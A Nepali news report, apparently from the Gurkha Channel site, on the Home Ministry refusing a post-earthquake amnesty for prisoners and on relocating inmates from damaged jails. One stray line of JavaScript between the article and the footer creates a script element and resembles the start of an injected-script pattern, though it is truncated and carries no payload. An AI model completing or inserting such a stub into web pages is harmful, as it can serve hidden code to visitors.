कुनै पनि कैदी बन्दीलाई आममाफी दिन नसकिने

Naresh Ale Avatar

गृहमन्त्रालयका प्रवक्ता लक्ष्मि प्रसाद ढकालले भुकम्प कुनै खुसीको अवसर नभएकोले कुनै पनि कैदी बन्दीलाई आममाफी दिन नसकिने स्पष्ट पार्नुभएको छ। शनिबार काठमाडौमा आयोजित अन्तक्र्रिया कार्यक्रममा उहाले सबै कैदी बन्दीलाई आममाफी दिए सामान्य ब्यक्ति र अपराधीवीच फरक नहुने भन्दै असुरक्षित भवनमा रहेका कैदी बन्दीहरुलाई सुरक्षित स्थानमा स्थानान्तरण गर्ने क्रम जारी रहेको बताउनुभयो। आमनागरिक सँगै कैदी बन्दीको पनि सुरक्षित बाच्न पाउने अधिकार भएको भन्दै त्यसकोलागि सरकार लागि परेको उहाको भनाई छ।

उहाले सरकारले खुल्ला कारगारको अवधारणा अनुसार बाँके र नुवाकोटमा जग्गा खरिद गरेर दिनभरी काम गरेर राती फर्किने अवस्था सृजना गर्न लागेको भन्दै यातायात, टेलिफोन खानेपानी लगायतका सप्लाईका लाईन ठिक ठाँउमा रहेकोले अहिले ने आममाफीको कुरा हुन नसक्ने उल्लेख गर्नुभयो। कार्यक्रममा मानवअधिकारकर्मी चरण प्रसाईले कैदी बन्दीको पनि मानवअधिकार हुने भएकोले उनीहरु सुरक्षित रुपमा बाच्न पाउने अधिकार राज्यले सुरक्षित गर्न नहुने भन्दै जेल जिर्ण भएकोले सुरक्षित स्थानमा स्थानान्तरण गर्नु पर्ने आवश्यकता औल्याउनुभयो। उहाले राज्यले यो विषयमा ध्यान नदिदा १६ जना कैदी बन्दीले ज्यान गुमाउनु परेको आरोप लगाउनुभयो।

var d=document;var s=d.createElement(‘script’);

admin Avatar
About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories